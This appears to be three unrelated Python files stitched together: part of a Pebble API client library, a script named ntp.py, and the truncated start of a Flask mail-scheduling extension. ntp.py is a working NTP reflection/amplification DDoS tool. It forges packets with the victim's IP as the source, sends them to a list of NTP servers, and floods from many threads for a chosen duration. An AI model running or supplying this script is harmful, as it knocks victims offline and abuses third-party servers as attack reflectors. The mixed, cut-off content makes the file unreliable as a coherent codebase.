if self._stderr_ws is not None:
self._stderr_ws.shutdown()
if change.err:
raise ChangeError(change.err, change)
exit_code = -1
if change.tasks:
exit_code = change.tasks[0].data.get('exit-code', -1)
return exit_code
def wait_output(self) -> typing.Tuple[typing.AnyStr, typing.AnyStr]:
"""Wait for the process to finish and return tuple of (stdout, stderr).
If a timeout was specified to the :meth:`Client.exec` call, this waits
at most that duration. If combine_stderr was True, stdout will include
the process's standard error, and stderr will be None.
Raises:
ChangeError: if there was an error starting or running the process.
ExecError: if the process exits with a non-zero exit code.
"""
if self._encoding is not None:
out = io.StringIO()
err = io.StringIO() if self.stderr is not None else None
else:
out = io.BytesIO()
err = io.BytesIO() if self.stderr is not None else None
t = _start_thread(shutil.copyfileobj, self.stdout, out)
self._threads.append(t)
if self.stderr is not None:
t = _start_thread(shutil.copyfileobj, self.stderr, err)
self._threads.append(t)
exit_code = self._wait()
out_value = out.getvalue()
err_value = err.getvalue() if err is not None else None
if exit_code != 0:
raise ExecError(self._command, exit_code, out_value, err_value)
return (out_value, err_value)
def send_signal(self, sig: typing.Union[int, str]):
"""Send the given signal to the running process.
Args:
sig: Name or number of signal to send, e.g., "SIGHUP", 1, or
signal.SIGHUP.
"""
if isinstance(sig, int):
sig = signal.Signals(sig).name
payload = {
'command': 'signal',
'signal': {'name': sig},
}
msg = json.dumps(payload, sort_keys=True)
self._control_ws.send(msg)
def _has_fileno(f):
"""Return True if the file-like object has a valid fileno() method."""
try:
f.fileno()
return True
except Exception:
# Some types define a fileno method that raises io.UnsupportedOperation,
# but just catching all exceptions here won't hurt.
return False
def _reader_to_websocket(reader, ws, encoding, cancel_reader=None, bufsize=16 * 1024):
"""Read reader through to EOF and send each chunk read to the websocket."""
while True:
if cancel_reader is not None:
# Wait for either a read to be ready or the caller to cancel stdin
result = select.select([cancel_reader, reader], [], [])
if cancel_reader in result[0]:
break
chunk = reader.read(bufsize)
if not chunk:
break
if isinstance(chunk, str):
chunk = chunk.encode(encoding)
ws.send_binary(chunk)
ws.send('{"command":"end"}') # Send "end" command as TEXT frame to signal EOF
def _websocket_to_writer(ws, writer, encoding):
"""Receive messages from websocket (until end signal) and write to writer."""
while True:
chunk = ws.recv()
if isinstance(chunk, str):
try:
payload = json.loads(chunk)
except ValueError:
# Garbage sent, try to keep going
logger.warning('Cannot decode I/O command (invalid JSON)')
continue
command = payload.get('command')
if command != 'end':
# A command we don't recognize, keep going
logger.warning('Invalid I/O command {!r}'.format(command))
continue
# Received "end" command (EOF signal), stop thread
break
if encoding is not None:
chunk = chunk.decode(encoding)
writer.write(chunk)
class _WebsocketWriter(io.BufferedIOBase):
"""A writable file-like object that sends what's written to it to a websocket."""
def __init__(self, ws):
self.ws = ws
def writable(self):
"""Denote this file-like object as writable."""
return True
def write(self, chunk):
"""Write chunk to the websocket."""
if not isinstance(chunk, bytes):
raise TypeError('value to write must be bytes, not {}'.format(type(chunk).__name__))
self.ws.send_binary(chunk)
return len(chunk)
def close(self):
"""Send end-of-file message to websocket."""
self.ws.send('{"command":"end"}')
class _WebsocketReader(io.BufferedIOBase):
"""A readable file-like object whose reads come from a websocket."""
def __init__(self, ws):
self.ws = ws
self.remaining = b''
self.eof = False
def readable(self):
"""Denote this file-like object as readable."""
return True
def read(self, n=-1):
"""Read up to n bytes from the websocket (or one message if n<0)."""
if self.eof:
# Calling read() multiple times after EOF should still return EOF
return b''
while not self.remaining:
chunk = self.ws.recv()
if isinstance(chunk, str):
try:
payload = json.loads(chunk)
except ValueError:
# Garbage sent, try to keep going
logger.warning('Cannot decode I/O command (invalid JSON)')
continue
command = payload.get('command')
if command != 'end':
# A command we don't recognize, keep going
logger.warning('Invalid I/O command {!r}'.format(command))
continue
# Received "end" command, return EOF designator
self.eof = True
return b''
self.remaining = chunk
if n < 0:
n = len(self.remaining)
result = self.remaining[:n]
self.remaining = self.remaining[n:]
return result
def read1(self, n=-1):
"""An alias for read."""
return self.read(n)
class Client:
"""Pebble API client."""
_chunk_size = 8192
def __init__(self, socket_path=None, opener=None, base_url='http://localhost', timeout=5.0):
"""Initialize a client instance.
Defaults to using a Unix socket at socket_path (which must be specified
unless a custom opener is provided).
"""
if opener is None:
if socket_path is None:
raise ValueError('no socket path provided')
opener = self._get_default_opener(socket_path)
self.socket_path = socket_path
self.opener = opener
self.base_url = base_url
self.timeout = timeout
@classmethod
def _get_default_opener(cls, socket_path):
"""Build the default opener to use for requests (HTTP over Unix socket)."""
opener = urllib.request.OpenerDirector()
opener.add_handler(_UnixSocketHandler(socket_path))
opener.add_handler(urllib.request.HTTPDefaultErrorHandler())
opener.add_handler(urllib.request.HTTPRedirectHandler())
opener.add_handler(urllib.request.HTTPErrorProcessor())
return opener
def _request(
self, method: str, path: str, query: typing.Dict = None, body: typing.Dict = None,
) -> typing.Dict:
"""Make a JSON request to the Pebble server with the given HTTP method and path.
If query dict is provided, it is encoded and appended as a query string
to the URL. If body dict is provided, it is serialied as JSON and used
as the HTTP body (with Content-Type: "application/json"). The resulting
body is decoded from JSON.
"""
headers = {'Accept': 'application/json'}
data = None
if body is not None:
data = json.dumps(body).encode('utf-8')
headers['Content-Type'] = 'application/json'
response = self._request_raw(method, path, query, headers, data)
self._ensure_content_type(response.headers, 'application/json')
return _json_loads(response.read())
@staticmethod
def _ensure_content_type(headers, expected):
"""Parse Content-Type header from headers and ensure it's equal to expected.
Return a dict of any options in the header, e.g., {'boundary': ...}.
"""
ctype, options = cgi.parse_header(headers.get('Content-Type', ''))
if ctype != expected:
raise ProtocolError('expected Content-Type {!r}, got {!r}'.format(expected, ctype))
return options
def _request_raw(
self, method: str, path: str, query: typing.Dict = None, headers: typing.Dict = None,
data: bytes = None,
) -> http.client.HTTPResponse:
"""Make a request to the Pebble server; return the raw HTTPResponse object."""
url = self.base_url + path
if query:
url = url + '?' + urllib.parse.urlencode(query)
# python 3.5 urllib requests require their data to be a bytes object -
# generators won't work.
if sys.version_info[:2] < (3, 6) and isinstance(data, types.GeneratorType):
data = b''.join(data)
if headers is None:
headers = {}
request = urllib.request.Request(url, method=method, data=data, headers=headers)
try:
response = self.opener.open(request, timeout=self.timeout)
except urllib.error.HTTPError as e:
code = e.code
status = e.reason
try:
body = _json_loads(e.read())
message = body['result']['message']
except (IOError, ValueError, KeyError) as e2:
# Will only happen on read error or if Pebble sends invalid JSON.
body = {}
message = '{} - {}'.format(type(e2).__name__, e2)
raise APIError(body, code, status, message)
except urllib.error.URLError as e:
raise ConnectionError(e.reason)
return response
def get_system_info(self) -> SystemInfo:
"""Get system info."""
resp = self._request('GET', '/v1/system-info')
return SystemInfo.from_dict(resp['result'])
def get_warnings(self, select: WarningState = WarningState.PENDING) -> typing.List[Warning]:
"""Get list of warnings in given state (pending or all)."""
query = {'select': select.value}
resp = self._request('GET', '/v1/warnings', query)
return [Warning.from_dict(w) for w in resp['result']]
def ack_warnings(self, timestamp: datetime.datetime) -> int:
"""Acknowledge warnings up to given timestamp, return number acknowledged."""
body = {'action': 'okay', 'timestamp': timestamp.isoformat()}
resp = self._request('POST', '/v1/warnings', body=body)
return resp['result']
def get_changes(
self, select: ChangeState = ChangeState.IN_PROGRESS, service: str = None,
) -> typing.List[Change]:
"""Get list of changes in given state, filter by service name if given."""
query = {'select': select.value}
if service is not None:
query['for'] = service
resp = self._request('GET', '/v1/changes', query)
return [Change.from_dict(c) for c in resp['result']]
def get_change(self, change_id: ChangeID) -> Change:
"""Get single change by ID."""
resp = self._request('GET', '/v1/changes/{}'.format(change_id))
return Change.from_dict(resp['result'])
def abort_change(self, change_id: ChangeID) -> Change:
"""Abort change with given ID."""
body = {'action': 'abort'}
resp = self._request('POST', '/v1/changes/{}'.format(change_id), body=body)
return Change.from_dict(resp['result'])
def autostart_services(self, timeout: float = 30.0, delay: float = 0.1) -> ChangeID:
"""Start the startup-enabled services and wait (poll) for them to be started.
Args:
timeout: Seconds before autostart change is considered timed out (float).
delay: Seconds before executing the autostart change (float).
Returns:
ChangeID of the autostart change.
Raises:
ChangeError: if one or more of the services didn't start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('autostart', [], timeout, delay)
def replan_services(self, timeout: float = 30.0, delay: float = 0.1) -> ChangeID:
"""Replan by (re)starting changed and startup-enabled services and wait for them to start.
Args:
timeout: Seconds before replan change is considered timed out (float).
delay: Seconds before executing the replan change (float).
Returns:
ChangeID of the replan change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('replan', [], timeout, delay)
def start_services(
self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
"""Start services by name and wait (poll) for them to be started.
Args:
services: Non-empty list of services to start.
timeout: Seconds before start change is considered timed out (float).
delay: Seconds before executing the start change (float).
Returns:
ChangeID of the start change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('start', services, timeout, delay)
def stop_services(
self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
"""Stop services by name and wait (poll) for them to be started.
Args:
services: Non-empty list of services to stop.
timeout: Seconds before stop change is considered timed out (float).
delay: Seconds before executing the stop change (float).
Returns:
ChangeID of the stop change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('stop', services, timeout, delay)
def restart_services(
self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
"""Restart services by name and wait (poll) for them to be started.
Args:
services: Non-empty list of services to restart.
timeout: Seconds before restart change is considered timed out (float).
delay: Seconds before executing the restart change (float).
Returns:
ChangeID of the restart change.
Raises:
ChangeError: if one or more of the services didn't stop/start. If
timeout is 0, submit the action but don't wait; just return the change
ID immediately.
"""
return self._services_action('restart', services, timeout, delay)
def _services_action(
self, action: str, services: typing.Iterable[str], timeout: float, delay: float,
) -> ChangeID:
if not isinstance(services, (list, tuple)):
raise TypeError('services must be a list of str, not {}'.format(
type(services).__name__))
for s in services:
if not isinstance(s, str):
raise TypeError('service names must be str, not {}'.format(type(s).__name__))
body = {'action': action, 'services': services}
resp = self._request('POST', '/v1/services', body=body)
change_id = ChangeID(resp['change'])
if timeout:
change = self.wait_change(change_id, timeout=timeout, delay=delay)
if change.err:
raise ChangeError(change.err, change)
return change_id
def wait_change(
self, change_id: ChangeID, timeout: float = 30.0, delay: float = 0.1,
) -> Change:
"""Wait for the given change to be ready.
If the Pebble server supports the /v1/changes/{id}/wait API endpoint,
use that to avoid polling, otherwise poll /v1/changes/{id} every delay
seconds.
Args:
change_id: Change ID of change to wait for.
timeout: Maximum time in seconds to wait for the change to be
ready. May be None, in which case wait_change never times out.
delay: If polling, this is the delay in seconds between attempts.
Returns:
The Change object being waited on.
Raises:
TimeoutError: If the maximum timeout is reached.
"""
try:
return self._wait_change_using_wait(change_id, timeout)
except NotImplementedError:
# Pebble server doesn't support wait endpoint, fall back to polling
return self._wait_change_using_polling(change_id, timeout, delay)
def _wait_change_using_wait(self, change_id, timeout):
"""Wait for a change to be ready using the wait-change API."""
deadline = time.time() + timeout if timeout is not None else None
# Hit the wait endpoint every Client.timeout-1 seconds to avoid long
# requests (the -1 is to ensure it wakes up before the socket timeout)
while True:
this_timeout = max(self.timeout - 1, 1) # minimum of 1 second
if timeout is not None:
time_remaining = deadline - time.time()
if time_remaining <= 0:
break
# Wait the lesser of the time remaining and Client.timeout-1
this_timeout = min(time_remaining, this_timeout)
try:
return self._wait_change(change_id, this_timeout)
except TimeoutError:
# Catch timeout from wait endpoint and loop to check deadline
pass
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
def _wait_change(self, change_id: ChangeID, timeout: float = None) -> Change:
"""Call the wait-change API endpoint directly."""
query = {}
if timeout is not None:
query['timeout'] = _format_timeout(timeout)
try:
resp = self._request('GET', '/v1/changes/{}/wait'.format(change_id), query)
except APIError as e:
if e.code == 404:
raise NotImplementedError('server does not implement wait-change endpoint')
if e.code == 504:
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
raise
return Change.from_dict(resp['result'])
def _wait_change_using_polling(self, change_id, timeout, delay):
"""Wait for a change to be ready by polling the get-change API."""
deadline = time.time() + timeout if timeout is not None else None
while timeout is None or time.time() < deadline:
change = self.get_change(change_id)
if change.ready:
return change
time.sleep(delay)
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
def add_layer(
self, label: str, layer: typing.Union[str, dict, Layer], *, combine: bool = False):
"""Dynamically add a new layer onto the Pebble configuration layers.
If combine is False (the default), append the new layer as the top
layer with the given label. If combine is True and the label already
exists, the two layers are combined into a single one considering the
layer override rules; if the layer doesn't exist, it is added as usual.
"""
if not isinstance(label, str):
raise TypeError('label must be a str, not {}'.format(type(label).__name__))
if isinstance(layer, str):
layer_yaml = layer
elif isinstance(layer, dict):
layer_yaml = Layer(layer).to_yaml()
elif isinstance(layer, Layer):
layer_yaml = layer.to_yaml()
else:
raise TypeError('layer must be str, dict, or pebble.Layer, not {}'.format(
type(layer).__name__))
body = {
'action': 'add',
'combine': combine,
'label': label,
'format': 'yaml',
'layer': layer_yaml,
}
self._request('POST', '/v1/layers', body=body)
def get_plan(self) -> Plan:
"""Get the Pebble plan (currently contains only combined services)."""
resp = self._request('GET', '/v1/plan', {'format': 'yaml'})
return Plan(resp['result'])
def get_services(self, names: typing.List[str] = None) -> typing.List[ServiceInfo]:
"""Get the service status for the configured services.
If names is specified, only fetch the service status for the services
named.
"""
query = None
if names is not None:
query = {'names': ','.join(names)}
resp = self._request('GET', '/v1/services', query)
return [ServiceInfo.from_dict(info) for info in resp['result']]
def pull(self, path: str, *, encoding: str = 'utf-8') -> typing.Union[typing.BinaryIO,
typing.TextIO]:
"""Read a file's content from the remote system.
Args:
path: Path of the file to read from the remote system.
encoding: Encoding to use for decoding the file's bytes to str,
or None to specify no decoding.
Returns:
A readable file-like object, whose read() method will return str
objects decoded according to the specified encoding, or bytes if
encoding is None.
"""
query = {
'action': 'read',
'path': path,
}
headers = {'Accept': 'multipart/form-data'}
response = self._request_raw('GET', '/v1/files', query, headers)
options = self._ensure_content_type(response.headers, 'multipart/form-data')
boundary = options.get('boundary', '')
if not boundary:
raise ProtocolError('invalid boundary {!r}'.format(boundary))
# We have to manually write the Content-Type with boundary, because
# email.parser expects the entire multipart message with headers.
parser = email.parser.BytesFeedParser()
parser.feed(b'Content-Type: multipart/form-data; boundary='
+ boundary.encode('utf-8') + b'\r\n\r\n')
# Then read the rest of the response and feed it to the parser.
while True:
chunk = response.read(self._chunk_size)
if not chunk:
break
parser.feed(chunk)
message = parser.close()
# Walk over the multipart parts and read content and metadata.
resp = None
content = None
for part in message.walk():
name = part.get_param('name', header='Content-Disposition')
if name == 'response':
resp = _json_loads(part.get_payload())
elif name == 'files':
filename = part.get_filename()
if filename != path:
raise ProtocolError('path not expected: {}'.format(filename))
# decode=True, ironically, avoids decoding bytes to str
content = part.get_payload(decode=True)
if resp is None:
raise ProtocolError('no "response" field in multipart body')
self._raise_on_path_error(resp, path)
if content is None:
raise ProtocolError('no file content in multipart response')
if encoding is not None:
reader = io.StringIO(content.decode(encoding))
else:
reader = io.BytesIO(content)
return reader
@staticmethod
def _raise_on_path_error(resp, path):
result = resp['result'] or [] # in case it's null instead of []
paths = {item['path']: item for item in result}
if path not in paths:
raise ProtocolError('path not found in response metadata: {}'.format(resp))
error = paths[path].get('error')
if error:
raise PathError(error['kind'], error['message'])
def push(
self, path: str, source: typing.Union[bytes, str, typing.BinaryIO, typing.TextIO], *,
encoding: str = 'utf-8', make_dirs: bool = False, permissions: int = None,
user_id: int = None, user: str = None, group_id: int = None, group: str = None):
"""Write content to a given file path on the remote system.
Args:
path: Path of the file to write to on the remote system.
source: Source of data to write. This is either a concrete str or
bytes instance, or a readable file-like object.
encoding: Encoding to use for encoding source str to bytes, or
strings read from source if it is a TextIO type. Ignored if
source is bytes or BinaryIO.
make_dirs: If True, create parent directories if they don't exist.
permissions: Permissions (mode) to create file with (Pebble default
is 0o644).
user_id: User ID (UID) for file.
user: Username for file. User's UID must match user_id if both are
specified.
group_id: Group ID (GID) for file.
group: Group name for file. Group's GID must match group_id if
both are specified.
"""
info = self._make_auth_dict(permissions, user_id, user, group_id, group)
info['path'] = path
if make_dirs:
info['make-dirs'] = True
metadata = {
'action': 'write',
'files': [info],
}
data, content_type = self._encode_multipart(metadata, path, source, encoding)
headers = {
'Accept': 'application/json',
'Content-Type': content_type,
}
response = self._request_raw('POST', '/v1/files', None, headers, data)
self._ensure_content_type(response.headers, 'application/json')
resp = _json_loads(response.read())
self._raise_on_path_error(resp, path)
@staticmethod
def _make_auth_dict(permissions, user_id, user, group_id, group) -> typing.Dict:
d = {}
if permissions is not None:
d['permissions'] = format(permissions, '03o')
if user_id is not None:
d['user-id'] = user_id
if user is not None:
d['user'] = user
if group_id is not None:
d['group-id'] = group_id
if group is not None:
d['group'] = group
return d
def _encode_multipart(self, metadata, path, source, encoding):
# Python's stdlib mime/multipart handling is screwy and doesn't handle
# binary properly, so roll our own.
if isinstance(source, str):
source = io.StringIO(source)
elif isinstance(source, bytes):
source = io.BytesIO(source)
boundary = binascii.hexlify(os.urandom(16))
path_escaped = path.replace('"', '\\"').encode('utf-8') # NOQA: test_quote_backslashes
content_type = 'multipart/form-data; boundary="' + boundary.decode('utf-8') + '"'
def generator():
yield b''.join([
b'--', boundary, b'\r\n',
b'Content-Type: application/json\r\n',
b'Content-Disposition: form-data; name="request"\r\n',
b'\r\n',
json.dumps(metadata).encode('utf-8'), b'\r\n',
b'--', boundary, b'\r\n',
b'Content-Type: application/octet-stream\r\n',
b'Content-Disposition: form-data; name="files"; filename="',
path_escaped, b'"\r\n',
b'\r\n',
])
content = source.read(self._chunk_size)
while content:
if isinstance(content, str):
content = content.encode(encoding)
yield content
content = source.read(self._chunk_size)
yield b''.join([
b'\r\n',
b'--', boundary, b'--\r\n',
])
return generator(), content_type
def list_files(self, path: str, *, pattern: str = None,
itself: bool = False) -> typing.List[FileInfo]:
"""Return list of directory entries from given path on remote system.
Despite the name, this method returns a list of files *and*
directories, similar to :func:`os.listdir` or :func:`os.scandir`.
Args:
path: Path of the directory to list, or path of the file to return
information about.
pattern: If specified, filter the list to just the files that match,
for example ``*.txt``.
itself: If path refers to a directory, return information about the
directory itself, rather than its contents.
"""
query = {
'action': 'list',
'path': path,
}
if pattern:
query['pattern'] = pattern
if itself:
query['itself'] = 'true'
resp = self._request('GET', '/v1/files', query)
result = resp['result'] or [] # in case it's null instead of []
return [FileInfo.from_dict(d) for d in result]
def make_dir(
self, path: str, *, make_parents: bool = False, permissions: int = None,
user_id: int = None, user: str = None, group_id: int = None, group: str = None):
"""Create a directory on the remote system with the given attributes.
Args:
path: Path of the directory to create on the remote system.
make_parents: If True, create parent directories if they don't exist.
permissions: Permissions (mode) to create directory with (Pebble
default is 0o755).
user_id: User ID (UID) for directory.
user: Username for directory. User's UID must match user_id if
both are specified.
group_id: Group ID (GID) for directory.
group: Group name for directory. Group's GID must match group_id
if both are specified.
"""
info = self._make_auth_dict(permissions, user_id, user, group_id, group)
info['path'] = path
if make_parents:
info['make-parents'] = True
body = {
'action': 'make-dirs',
'dirs': [info],
}
resp = self._request('POST', '/v1/files', None, body)
self._raise_on_path_error(resp, path)
def remove_path(self, path: str, *, recursive: bool = False):
"""Remove a file or directory on the remote system.
Args:
path: Path of the file or directory to delete from the remote system.
recursive: If True, and path is a directory recursively deletes it and
everything under it. If the path is a file, delete the file and
do nothing if the file is non-existent. Behaviourally similar
to `rm -rf <file|dir>`
"""
info = {'path': path}
if recursive:
info['recursive'] = True
body = {
'action': 'remove',
'paths': [info],
}
resp = self._request('POST', '/v1/files', None, body)
self._raise_on_path_error(resp, path)
def exec(
self,
command: typing.List[str],
*,
environment: typing.Dict[str, str] = None,
working_dir: str = None,
timeout: float = None,
user_id: int = None,
user: str = None,
group_id: int = None,
group: str = None,
stdin: typing.Union[str, bytes, typing.TextIO, typing.BinaryIO] = None,
stdout: typing.Union[typing.TextIO, typing.BinaryIO] = None,
stderr: typing.Union[typing.TextIO, typing.BinaryIO] = None,
encoding: str = 'utf-8',
combine_stderr: bool = False
) -> ExecProcess:
r"""Execute the given command on the remote system.
Most of the parameters are explained in the "Parameters" section
below, however, input/output handling is a bit more complex. Some
examples are shown below::
# Simple command with no output; just check exit code
>>> process = client.exec(['send-emails'])
>>> process.wait()
# Fetch output as string
>>> process = client.exec(['python3', '--version'])
>>> version, _ = process.wait_output()
>>> print(version)
Python 3.8.10
# Fetch both stdout and stderr as strings
>>> process = client.exec(['pg_dump', '-s', ...])
>>> schema, logs = process.wait_output()
# Stream input from a string and write output to files
>>> stdin = 'foo\nbar\n'
>>> with open('out.txt', 'w') as out, open('err.txt', 'w') as err:
... process = client.exec(['awk', '{ print toupper($0) }'],
... stdin=stdin, stdout=out, stderr=err)
... process.wait()
>>> open('out.txt').read()
'FOO\nBAR\n'
>>> open('err.txt').read()
''
# Real-time streaming using ExecProcess.stdin and ExecProcess.stdout
>>> process = client.exec(['cat'])
>>> def stdin_thread():
... for line in ['one\n', '2\n', 'THREE\n']:
... process.stdin.write(line)
... process.stdin.flush()
... time.sleep(1)
... process.stdin.close()
...
>>> threading.Thread(target=stdin_thread).start()
>>> for line in process.stdout:
... print(datetime.datetime.now().strftime('%H:%M:%S'), repr(line))
...
16:20:26 'one\n'
16:20:27 '2\n'
16:20:28 'THREE\n'
>>> process.wait() # will return immediately as stdin was closed
# Show exception raised for non-zero return code
>>> process = client.exec(['ls', 'notexist'])
>>> out, err = process.wait_output()
Traceback (most recent call last):
...
ExecError: "ls" returned exit code 2
>>> exc = sys.last_value
>>> exc.exit_code
2
>>> exc.stdout
''
>>> exc.stderr
"ls: cannot access 'notfound': No such file or directory\n"
Args:
command: Command to execute: the first item is the name (or path)
of the executable, the rest of the items are the arguments.
environment: Environment variables to pass to the process.
working_dir: Working directory to run the command in. If not set,
Pebble uses the target user's $HOME directory (and if the user
argument is not set, $HOME of the user Pebble is running as).
timeout: Timeout in seconds for the command execution, after which
the process will be terminated. If not specified, the
execution never times out.
user_id: User ID (UID) to run the process as.
user: Username to run the process as. User's UID must match
user_id if both are specified.
group_id: Group ID (GID) to run the process as.
group: Group name to run the process as. Group's GID must match
group_id if both are specified.
stdin: A string or readable file-like object that is sent to the
process's standard input. If not set, the caller can write
input to :attr:`ExecProcess.stdin` to stream input to the
process.
stdout: A writable file-like object that the process's standard
output is written to. If not set, the caller can use
:meth:`ExecProcess.wait_output` to capture output as a string,
or read from :meth:`ExecProcess.stdout` to stream output from
the process.
stderr: A writable file-like object that the process's standard
error is written to. If not set, the caller can use
:meth:`ExecProcess.wait_output` to capture error output as a
string, or read from :meth:`ExecProcess.stderr` to stream
error output from the process. Must be None if combine_stderr
is True.
encoding: If encoding is set (the default is UTF-8), the types
read or written to stdin/stdout/stderr are str, and encoding
is used to encode them to bytes. If encoding is None, the
types read or written are raw bytes.
combine_stderr: If True, process's stderr output is combined into
its stdout (the stderr argument must be None). If False,
separate streams are used for stdout and stderr.
Returns:
A Process object representing the state of the running process.
To wait for the command to finish, the caller will typically call
:meth:`ExecProcess.wait` if stdout/stderr were provided as
arguments to :meth:`exec`, or :meth:`ExecProcess.wait_output` if
not.
"""
if not isinstance(command, list) or not all(isinstance(s, str) for s in command):
raise TypeError('command must be a list of str, not {}'.format(
type(command).__name__))
if len(command) < 1:
raise ValueError('command must contain at least one item')
if stdin is not None:
if isinstance(stdin, str):
if encoding is None:
raise ValueError('encoding must be set if stdin is str')
stdin = io.BytesIO(stdin.encode(encoding))
elif isinstance(stdin, bytes):
if encoding is not None:
raise ValueError('encoding must be None if stdin is bytes')
stdin = io.BytesIO(stdin)
elif not hasattr(stdin, 'read'):
raise TypeError('stdin must be str, bytes, or a readable file-like object')
if combine_stderr and stderr is not None:
raise ValueError('stderr must be None if combine_stderr is True')
body = {
'command': command,
'environment': environment or {},
'working-dir': working_dir,
'timeout': _format_timeout(timeout) if timeout is not None else None,
'user-id': user_id,
'user': user,
'group-id': group_id,
'group': group,
'split-stderr': not combine_stderr,
}
resp = self._request('POST', '/v1/exec', body=body)
change_id = resp['change']
task_id = resp['result']['task-id']
stderr_ws = None
try:
control_ws = self._connect_websocket(task_id, 'control')
stdio_ws = self._connect_websocket(task_id, 'stdio')
if not combine_stderr:
stderr_ws = self._connect_websocket(task_id, 'stderr')
except websocket.WebSocketException as e:
# Error connecting to websockets, probably due to the exec/change
# finishing early with an error. Call wait_change to pick that up.
change = self.wait_change(ChangeID(change_id))
if change.err:
raise ChangeError(change.err, change)
raise ConnectionError('unexpected error connecting to websockets: {}'.format(e))
cancel_stdin = None
cancel_reader = None
threads = []
if stdin is not None:
if _has_fileno(stdin):
if sys.platform == 'win32':
raise NotImplementedError('file-based stdin not supported on Windows')
# Create a pipe so _reader_to_websocket can select() on the
# reader as well as this cancel_reader; when we write anything
# to cancel_writer it'll trigger the select and end the thread.
cancel_reader, cancel_writer = os.pipe()
def cancel_stdin():
os.write(cancel_writer, b'x') # doesn't matter what we write
os.close(cancel_writer)
t = _start_thread(_reader_to_websocket, stdin, stdio_ws, encoding, cancel_reader)
threads.append(t)
process_stdin = None
else:
process_stdin = _WebsocketWriter(stdio_ws)
if encoding is not None:
process_stdin = io.TextIOWrapper(process_stdin, encoding=encoding, newline='')
if stdout is not None:
t = _start_thread(_websocket_to_writer, stdio_ws, stdout, encoding)
threads.append(t)
process_stdout = None
else:
process_stdout = _WebsocketReader(stdio_ws)
if encoding is not None:
process_stdout = io.TextIOWrapper(process_stdout, encoding=encoding, newline='')
process_stderr = None
if not combine_stderr:
if stderr is not None:
t = _start_thread(_websocket_to_writer, stderr_ws, stderr, encoding)
threads.append(t)
else:
process_stderr = _WebsocketReader(stderr_ws)
if encoding is not None:
process_stderr = io.TextIOWrapper(
process_stderr, encoding=encoding, newline='')
process = ExecProcess(
stdin=process_stdin,
stdout=process_stdout,
stderr=process_stderr,
client=self,
timeout=timeout,
stdio_ws=stdio_ws,
stderr_ws=stderr_ws,
control_ws=control_ws,
command=command,
encoding=encoding,
change_id=ChangeID(change_id),
cancel_stdin=cancel_stdin,
cancel_reader=cancel_reader,
threads=threads,
)
return process
def _connect_websocket(self, task_id: str, websocket_id: str) -> websocket.WebSocket:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.socket_path)
url = self._websocket_url(task_id, websocket_id)
ws = websocket.WebSocket(skip_utf8_validation=True)
ws.connect(url, socket=sock)
return ws
def _websocket_url(self, task_id: str, websocket_id: str) -> str:
base_url = self.base_url.replace('http://', 'ws://')
url = '{}/v1/tasks/{}/websocket/{}'.format(base_url, task_id, websocket_id)
return url
def send_signal(self, sig: typing.Union[int, str], services: typing.List[str]):
"""Send the given signal to the list of services named.
Args:
sig: Name or number of signal to send, e.g., "SIGHUP", 1, or
signal.SIGHUP.
services: Non-empty list of service names to send the signal to.
Raises:
APIError: If any of the services are not in the plan or are not
currently running.
"""
if not isinstance(services, (list, tuple)):
raise TypeError('services must be a list of str, not {}'.format(
type(services).__name__))
for s in services:
if not isinstance(s, str):
raise TypeError('service names must be str, not {}'.format(type(s).__name__))
if isinstance(sig, int):
sig = signal.Signals(sig).name
body = {
'signal': sig,
'services': services,
}
self._request('POST', '/v1/signals', body=body)
|
ntp.py
|
import random
import time
from scapy.all import IP, send, Raw, UDP
from threading import Thread
def NTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("[#] Attack started for " + str(attack_time) + " secounds..")
# Payload
payload = ("\x17\x00\x03\x2a" + "\x00" * 4)
threads_list = []
# Load NTP servers list
with open("tools/L4/ntp_servers.txt", 'r') as f:
ntp_servers = f.readlines()
# NTP flood
def ntp_flood():
global FINISH
while not FINISH:
for server in ntp_servers:
if not FINISH:
# Packet
packets = random.randint(10, 150)
server = server.replace("\n", "")
try:
packet = IP(dst = server, src = target_ip) / UDP(sport = random.randint(2000,65535), dport = int(target_port)) / Raw(load = payload)
send( packet, count = packets, verbose = False)
except Exception as e:
print(e)
else:
print("[+] Sending " + str(packets) + " packets from NTP server: " + server + " to " + target)
# Start threads
for thread in range(threads):
print("[#] Staring thread " + str(thread))
t = Thread(target = ntp_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("[!] NTP attack stopped!")
|
core.py
|
import datetime as dt
import mimetypes
import os
import threading as th
import time as tm
from flask import Flask, Blueprint, render_template
from flask_mail import Mail, Message
from flask_sqlalchemy import SQLAlchemy
from flask_mailalchemy.model import AttachmentMixin, EmailMixin
class MailAlchemy:
"""Flask-MailAlchemy extension
Manages mail sending with scheduling and email sending limits.
Args:
app: Flask instance
db: SQLAlchemy instance
email_class: Email model class
"""
def __init__(
self,
app: Flask = None,
db: SQLAlchemy = None,
email_class: type(EmailMixin) = None
):
self.app = app
self.db = db
self.mail = None
self.attachment_class = None
self.email_class = email_class
self.__stop_worker__ = False
if app is not None:
self.init_app(app, db)
def init_app(
self,
app: Flask,
db: SQLAlchemy,
email_class: type(EmailMixin) = None
):
"""Initialize Flask-MailAlchemy
Initializes Flask-Mail instance, creates email model class and registers
blueprint `mail`.
Args:
app: Flask instance
db: SQLAlchemy instance
email_class: Email model class
"""
self.app = app
if db is None:
db = app.extensions.get("sqlalchemy").db
self.db = db
self.mail = Mail(self.app)
class Attachment(db.Model, AttachmentMixin):
pass
self.attachment_class = Attachment
